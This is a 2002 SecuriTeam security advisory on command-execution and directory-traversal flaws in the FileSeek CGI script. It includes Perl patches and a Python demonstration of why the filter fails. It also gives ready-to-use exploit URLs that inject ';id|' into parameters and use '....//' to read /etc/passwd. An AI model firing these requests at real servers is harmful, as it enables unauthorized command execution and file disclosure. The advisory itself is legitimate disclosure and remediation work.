[UNIX] FileSeek CGI Script Command Execution and Arbitrary File Viewing Vulnerabilities
From: support@securiteam.com Date: 04/17/02
From: support@securiteam.com To: list@securiteam.com Date: Wed, 17 Apr 2002 14:42:11 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
FileSeek CGI Script Command Execution and Arbitrary File Viewing Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.cgi-perl.com/programs/FileSeek/> FileSeek is a simple search
program that allows visitors to a site to look at the contents of file
directories and to search through those directories for filenames matching
a specified text string. Contrary to what the program states, it is possible
to view the content of files that were not meant to be viewable, for example
/etc/passwd, simply by including a traversal string in the supplied
parameters.
DETAILS
There are two vulnerabilities in the script:
* The first is that the script does not filter shell escape characters,
allowing execution of arbitrary commands.
* The second is a directory traversal bug that lets you read any file on
the server. The script strips "../" out of the request in a single pass,
which can be bypassed by sending "....//": once "../" has been removed
from it, "../" is what remains.
Command execution vulnerability:
http://host/cgi-bin/FileSeek.cgi?head=&foot=;id|
http://host/cgi-bin/FileSeek.cgi?head=;id|&foot=
http://host/cgi-bin/FileSeek.cgi?head=&foot=|id|
http://host/cgi-bin/FileSeek.cgi?head=|id|&foot=
Directory traversal vulnerability:
http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
Unofficial patch:
Patch for Command execution vulnerability:
Add the following two lines below the "Generate the HTML page" banner:
####################################################################
# Generate the HTML page #
####################################################################
$ARGS{'head'} =~ tr/\|\;/XX/;
$ARGS{'foot'} =~ tr/\|\;/XX/;
This will make the request bogus if it contains a ; or |, so that it will
result in an error.
Patch for Directory traversal vulnerability:
Change the following part:
# Make sure they're not trying to access an invalid directory
if ($directory =~ /$DD\.\./) { $directory = '' }
$ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
$ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
Into:
# Make sure they're not trying to access an invalid directory
if ($directory =~ /$DD\.\./) { $directory = '' }
$ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
$ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
This makes the script filter on ".." rather than on "../", so no ".." can
survive the substitution.
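Added example, not from the advisory or from FileSeek itself: the original and patched filters re-implemented in Python with re.sub and run against the advisory's "....//" string, plus a canonicalization check that the advisory does not suggest. The values of $DD and $ALLOWED_DIR are assumed.

```python
import posixpath
import re

# Assumed stand-ins for the script's $DD (directory delimiter) and
# $ALLOWED_DIR; the real values are site configuration in FileSeek.cgi.
DD = "/"
ALLOWED_DIR = "/var/www/fileseek"

# The traversal string quoted in the advisory.
TRAVERSAL = "....//....//....//....//....//....//....//etc/passwd"


def filter_original(value: str) -> str:
    """The filter the advisory reports as vulnerable: one non-iterative
    pass removes '../' (or a trailing '..'), so '....//' collapses to '../'."""
    pattern = rf"(^{re.escape(ALLOWED_DIR)})|(^{re.escape(DD)})|(\.\.({re.escape(DD)}|$))"
    return re.sub(pattern, "", value)


def filter_patched(value: str) -> str:
    """The unofficial patch: remove every '..' regardless of what follows."""
    pattern = rf"(^{re.escape(ALLOWED_DIR)})|(^{re.escape(DD)})|(\.\.)"
    return re.sub(pattern, "", value)


def strip_shell_metachars(value: str) -> str:
    """Python equivalent of the patch's tr/\\|\\;/XX/: '|' and ';' become 'X'."""
    return value.replace("|", "X").replace(";", "X")


def resolves_inside_allowed(value: str, base: str = ALLOWED_DIR) -> bool:
    """Defensive check the advisory does not give: canonicalize the final
    path and require it to stay under base. posixpath.join discards base
    when value is absolute, so the check is done on the joined result."""
    target = posixpath.normpath(posixpath.join(base, value))
    return target == base or target.startswith(base + "/")


if __name__ == "__main__":
    print("original filter :", filter_original(TRAVERSAL))
    print("patched filter  :", filter_patched(TRAVERSAL))
    print("inside allowed? :", resolves_inside_allowed(filter_original(TRAVERSAL)))
```

Running it shows the original filter leaving seven "../" segments while the patched one leaves none, and the canonical check rejecting the traversal result either way.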
ADDITIONAL INFORMATION
The information has been provided by
<mailto:nighthawk@hackers4hackers.org> Thijs Bosschert.